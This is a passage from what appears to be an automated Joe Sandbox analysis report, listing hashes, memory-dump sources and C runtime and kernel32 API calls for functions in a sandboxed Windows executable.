                                                            • Opcode ID: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
                                                            • Instruction ID: 117dcb51b9369f2a586f21834e617b47eee04d668be0a6b73f71d15a096a5aab
                                                            • Opcode Fuzzy Hash: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
                                                            • Instruction Fuzzy Hash: C9119EB1605309AADB20AF689406B9D73E4AF08729F247529F0A4FB7D0CB34D9C1C661
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1539EB79,?,?,00000000,00DE1FC8,000000FF,?,00DD0EE0,00DD1010,?,00DD0EB4,00000000), ref: 00DD0F85
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DD0F97
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DE1FC8,000000FF,?,00DD0EE0,00DD1010,?,00DD0EB4,00000000), ref: 00DD0FB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: cffa64d000bd6436ea9d83ec169476a4b06b7eca58a2642f1b738212b0f3c982
                                                            • Instruction ID: 51501511507624930fb2c256a160def31b993965b5d156db49eb478cdc4cb844
                                                            • Opcode Fuzzy Hash: cffa64d000bd6436ea9d83ec169476a4b06b7eca58a2642f1b738212b0f3c982
                                                            • Instruction Fuzzy Hash: 3E014431504795AFDB11AF51DC49BBEBBB8FB44B14F040529F811E6390DB74A904CAA0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 2583058844-0
                                                            • Opcode ID: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
                                                            • Instruction ID: 10fd2dea5c42687dc32271517f6bcb968e512b3ca106d47d2fc6a2637aeb205b
                                                            • Opcode Fuzzy Hash: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
                                                            • Instruction Fuzzy Hash: 8BC118B2E0021AABCF21EB64DC85AED77BDEF08304F1151E1FA09B6150DB359B858F61
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                            • String ID:
                                                            • API String ID: 3132042578-0
                                                            • Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
                                                            • Instruction ID: 3677f7c9fd4f9d6f12da6088b1cff56e9feeeca1e0d7e2c526ac8a0083677072
                                                            • Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
                                                            • Instruction Fuzzy Hash: 58318B35C043509ACB22AF79AD48A853BA0EF44765F10267AE500E32B1EFB5C480CF89
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator+$NameName::
                                                            • String ID:
                                                            • API String ID: 168861036-0
                                                            • Opcode ID: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
                                                            • Instruction ID: 4f3ced38e45a1ef10f2675d566768d00042eee6328c5caa6aa589489ed447edb
                                                            • Opcode Fuzzy Hash: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
                                                            • Instruction Fuzzy Hash: 01016130600209AFCF14EBA4DC42EED7BB5EF48708F105155F506AB2D2DB70E9858B84
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00DC4442
                                                            • int.LIBCPMT ref: 00DC4455
                                                              • Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
                                                              • Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF
                                                            • std::_Facet_Register.LIBCPMT ref: 00DC4488
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00DC449E
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00DC44A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                            • String ID:
                                                            • API String ID: 2081738530-0
                                                            • Opcode ID: b444eb98bff9b9aab1bd92e67dbd134f564bc5c861be8b409b15a18f40710020
                                                            • Instruction ID: 251adb8d60a02266e17f8e568dc9b6d716ece678bfdb2d81503da3e040d28531
                                                            • Opcode Fuzzy Hash: b444eb98bff9b9aab1bd92e67dbd134f564bc5c861be8b409b15a18f40710020
                                                            • Instruction Fuzzy Hash: 19012B7A500126EBCB19EB54D815FAD7B68EF81760B34015DF805A7291EF70DE02C7B0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00DC4315
                                                            • int.LIBCPMT ref: 00DC4328
                                                              • Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
                                                              • Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF
                                                            • std::_Facet_Register.LIBCPMT ref: 00DC435B
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00DC4371
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00DC437C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                            • String ID:
                                                            • API String ID: 2081738530-0
                                                            • Opcode ID: b2d0ba450194c1948ded9f8a4d3e98f5ebde7ead527af31a72d170cc0edd8610
                                                            • Instruction ID: 9b6583d080fc5a23891ed4d578ff49980433a79448189602f832d7852cd343cd
                                                            • Opcode Fuzzy Hash: b2d0ba450194c1948ded9f8a4d3e98f5ebde7ead527af31a72d170cc0edd8610
                                                            • Instruction Fuzzy Hash: F201A736940526ABCB15BF64E815EDD7774EFC1760B14015DF801A7291DF349E06CBB0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                            • String ID:
                                                            • API String ID: 156189095-0
                                                            • Opcode ID: 9de997c768efbb474adc4ad8d48e5291dcd4cf86fd04a94ab6091726fd0c38f9
                                                            • Instruction ID: 44765dc6d0b6502e21a8f4e3b31399bbee126c0943c5241dcb5ea238a9219e7b
                                                            • Opcode Fuzzy Hash: 9de997c768efbb474adc4ad8d48e5291dcd4cf86fd04a94ab6091726fd0c38f9
                                                            • Instruction Fuzzy Hash: 85015A79A006529FD70ABB20A85AF7C7BA1FF85350B28400DF94157381CB34AE46DFB6
                                                            APIs
                                                            • __getptd.LIBCMT ref: 00E14FBA
                                                              • Part of subcall function 00E1194C: __getptd_noexit.LIBCMT ref: 00E1194F
                                                              • Part of subcall function 00E1194C: __amsg_exit.LIBCMT ref: 00E1195C
                                                            • __calloc_crt.LIBCMT ref: 00E14FC5
                                                            • __lock.LIBCMT ref: 00E14FFB
                                                            • ___addlocaleref.LIBCMT ref: 00E15007
                                                            • __lock.LIBCMT ref: 00E1501B
                                                              • Part of subcall function 00E10AEC: __getptd_noexit.LIBCMT ref: 00E10AEC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
                                                            • String ID:
                                                            • API String ID: 2820776222-0
                                                            • Opcode ID: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
                                                            • Instruction ID: 29e53b952f8137c824643e7b1a9c3888b0c5bf99fbece963e23d231c5737cfea
                                                            • Opcode Fuzzy Hash: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
                                                            • Instruction Fuzzy Hash: FA018472541709EEEB20BFB49803B9C77E0AF44720F206659F4A4BB6C2CB7449C1DB56
                                                            APIs
                                                            • __getptd.LIBCMT ref: 00E1371D
                                                              • Part of subcall function 00E1194C: __getptd_noexit.LIBCMT ref: 00E1194F
                                                              • Part of subcall function 00E1194C: __amsg_exit.LIBCMT ref: 00E1195C
                                                            • __getptd.LIBCMT ref: 00E13734
                                                            • __amsg_exit.LIBCMT ref: 00E13742
                                                            • __lock.LIBCMT ref: 00E13752
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00E13766
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
                                                            • Instruction ID: 55478a1df3cc07245d1b4fd66c0ea7caffef4d790f3366837ffdc3c31959c9a1
                                                            • Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
                                                            • Instruction Fuzzy Hash: 8AF02BB2940304ABD721FB745803BCE32D06F00724F15351AF050775D2CB245AC0DA5A
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DCB353,00000000,?,00E4ECD4,?,?,?,00DCB4F6,00000004,InitializeCriticalSectionEx,00DE4BD8,InitializeCriticalSectionEx), ref: 00DCB3AF
                                                            • GetLastError.KERNEL32(?,00DCB353,00000000,?,00E4ECD4,?,?,?,00DCB4F6,00000004,InitializeCriticalSectionEx,00DE4BD8,InitializeCriticalSectionEx,00000000,?,00DCB2AD), ref: 00DCB3B9
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DCB3E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID: api-ms-
                                                            • API String ID: 3177248105-2084034818
                                                            • Opcode ID: 2439801e1f122bc8bdd5f1698039a8c0b3e3419e216f9c902a36f55539573df7
                                                            • Instruction ID: f7faad4f86741907515a9449b4db9e080a83bb7e2654d44d21186b87b31b094f
                                                            • Opcode Fuzzy Hash: 2439801e1f122bc8bdd5f1698039a8c0b3e3419e216f9c902a36f55539573df7
                                                            • Instruction Fuzzy Hash: 38E012302403C5B7EA112FB1EC8AF293A549B00B61F144026FA0CE91E1D761DA5086B4
                                                            APIs
                                                            • GetConsoleOutputCP.KERNEL32(1539EB79,00000000,00000000,00000000), ref: 00DD77AA
                                                              • Part of subcall function 00DD952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00DD8FD3,?,00000000,-00000008), ref: 00DD95D6
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DD7A05
                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DD7A4D
                                                            • GetLastError.KERNEL32 ref: 00DD7AF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                            • String ID:
                                                            • API String ID: 2112829910-0
                                                            • Opcode ID: e4ded300f1f8064f1b8a7746228115bdd597ea7e0756ffeb4defef5f23060d62
                                                            • Instruction ID: 5aeba081308692f9932249bed896faa95bc318691f5e22f3a81bd944a585752e
                                                            • Opcode Fuzzy Hash: e4ded300f1f8064f1b8a7746228115bdd597ea7e0756ffeb4defef5f23060d62
                                                            • Instruction Fuzzy Hash: FED16975E04258AFCB15CFA8D8809ADBBB5FF49304F18416AE859EB351E730A946CF60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID:
                                                            • API String ID: 2102423945-0
                                                            • Opcode ID: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
                                                            • Instruction ID: ea857eb7879d0bed8631b85f759a196f4de18a88e7998a8b279b4a7aeca954ab
                                                            • Opcode Fuzzy Hash: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
                                                            • Instruction Fuzzy Hash: EFD1C47291012DAADB20EB94DC82AE9B7B9EF04304F1554E7A608B3051DA707F89CFB1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AdjustPointer
                                                            • String ID:
                                                            • API String ID: 1740715915-0
                                                            • Opcode ID: 5b7ff6192cc3806aaeeb37e8801c163556dcdbae88a8e1bd6715eef191492ac8
                                                            • Instruction ID: 20f40045e5df1772ee4045cc623631fa7dfcbb2eeddb24ff76c1212be2d76fbe
                                                            • Opcode Fuzzy Hash: 5b7ff6192cc3806aaeeb37e8801c163556dcdbae88a8e1bd6715eef191492ac8
                                                            • Instruction Fuzzy Hash: 9F51267260820B9FDB298F98D845F7A77B4EF00318F28452DE84987291E771EC41DBB2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID:
                                                            • API String ID: 2102423945-0
                                                            • Opcode ID: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
                                                            • Instruction ID: a5ac14e05aace89f8723af4cd375242c4c7b2f050e61ce3885424b6389a489fa
                                                            • Opcode Fuzzy Hash: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
                                                            • Instruction Fuzzy Hash: 4B51CAB1E4026E9BCB21EF24CC82ADDB3BDEB04704F4251E5A718B3151DA346F868F64
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID:
                                                            • API String ID: 2102423945-0
                                                            • Opcode ID: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
                                                            • Instruction ID: 8f22dbd44f2a82ecb83fe7c60ebec10c569068ea5973f16d9145a4275d7af15e
                                                            • Opcode Fuzzy Hash: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
                                                            • Instruction Fuzzy Hash: 4841A371D4021CBADB14FB60DC47FDD77B8EB08700F2494A5B605A7090EAB5AB888FA1
                                                            APIs
                                                            • __getptd.LIBCMT ref: 00E139B9
                                                              • Part of subcall function 00E1194C: __getptd_noexit.LIBCMT ref: 00E1194F
                                                              • Part of subcall function 00E1194C: __amsg_exit.LIBCMT ref: 00E1195C
                                                            • __amsg_exit.LIBCMT ref: 00E139D9
                                                            • __lock.LIBCMT ref: 00E139E9
                                                            • _free.LIBCMT ref: 00E13A19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
